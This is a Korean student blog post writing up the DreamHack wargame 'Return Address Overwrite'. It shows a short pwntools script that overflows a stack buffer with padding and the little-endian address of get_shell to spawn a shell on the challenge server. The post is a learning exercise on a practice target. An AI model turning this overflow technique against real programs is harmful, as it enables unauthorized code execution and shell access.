[ DreamHack ] Return Address Overwrite-2

2022. 11. 15. 16:46·INTERLUDE ✦/2022 SYSTEM STUDY

문제 링크

https://dreamhack.io/wargame/challenges/351/

 

Return Address Overwrite

Description Exploit Tech: Return Address Overwrite에서 실습하는 문제입니다.

dreamhack.io

문제 파일에 있는걸 다운받아야 하는데

강의에 있는 코드를 복붙해 버려서 안 되던 거였음....ㅎ

드림핵 댓글 보고 알았다 . . ..

 

gdb에서 print를 이용해서 get_shell의 주소를 확인해 보면 0x4006aa임을 알 수 있다.

리틀 엔디언 방식으로 주소를 다시 작성해보면 \xaa\x06\x40\x00\x00\x00\x00\x00\x00가 된다.

 

pwntools를 이용해서 익스플로잇 코드를 작성하였다

from pwn import *

p = remote('host3.dreamhack.games',20656)

payload = 'A' * 0x30
payload += 'B' * 0x08
payload += '\xaa\x06\x40\x00\x00\x00\x00\x00\x00'

p.recv()
p.sendline(payload)
p.interactive()

성공적으로 플래그를 획득하였다.

 

'INTERLUDE ✦ > 2022 SYSTEM STUDY' 카테고리의 다른 글

[ DreamHack ] Stack Canary  (0) 2022.11.22
[ DreamHack ] basic_exploitation_001  (0) 2022.11.17
[ DreamHack ] Return Address Overwrite  (0) 2022.11.08
[ DreamHack ] Stack Buffer Overflow  (0) 2022.11.08
[ DreamHack ] ShellCode  (0) 2022.11.03
'INTERLUDE ✦/2022 SYSTEM STUDY' 카테고리의 다른 글
  • [ DreamHack ] Stack Canary
  • [ DreamHack ] basic_exploitation_001
  • [ DreamHack ] Return Address Overwrite
  • [ DreamHack ] Stack Buffer Overflow
L_Chae
L_Chae
🎮😻🤓🖥✨
  • L_Chae
    Cherish
    L_Chae
  • 전체
    오늘
    어제
    • 분류 전체보기
      • 🌥️Cloud Study🌥️
        • AWS
        • NHN
        • KT
        • Microsoft (Azure 900)
        • TroubleShooting
        • IaC
        • Etc
      • STUDY
        • English
        • Japanese
        • 개인정보보호 관련
      • 초등학교 AI 교육 진행
        • 2024학년도 1학년-2학년
        • 2025학년도 4학년
      • 2024 KDT 📕
        • Lecture
        • Study 📗
        • Study-JAVA
        • Project
        • etc
      • INTERLUDE ✦
        • 2022 SYSTEM STUDY
        • 2022 Winter Study
        • 2023 AutoMobility STUDY
        • 2023 Summer Study (CPPG)
        • 2023 Reversing STUDY
        • etc
      • Private🔒
        • MacBook 💻
        • Screenshot 🩷
        • Photo 🖼️
        • FFXIV - Backup 🎮
        • Tistory
      • PBL 📗
        • 논문 스터디
        • Backup
      • Project 🖤
        • 2022-2) 개인정보보호 소학회
        • 2022-2) winter GURU2 - iOS
        • 2023-1) PBL 3
        • 2023-2) PBL 4
        • 2024-1) SW-AI교육 실습 일지
      • CTF 🚩
        • 2022
        • 2023
      • News scrap 📰
        • 2022
        • 2023
      • 2022 공부 로그 🐯
      • 2023 공부 로그🐰
  • 블로그 메뉴

    • 글쓰기
    • 홈
    • 태그
    • 방명록
  • 링크

  • 공지사항

  • 인기 글

  • 태그

    jlpt n1 도전기
    ansible galaxy
    멱등성
    JLPT
    N1
    JLPT N1
    content collection
    deprecation warning
    ansible
  • 최근 댓글

  • 최근 글

  • hELLO· Designed By정상우.v4.10.3
L_Chae
[ DreamHack ] Return Address Overwrite-2
상단으로

티스토리툴바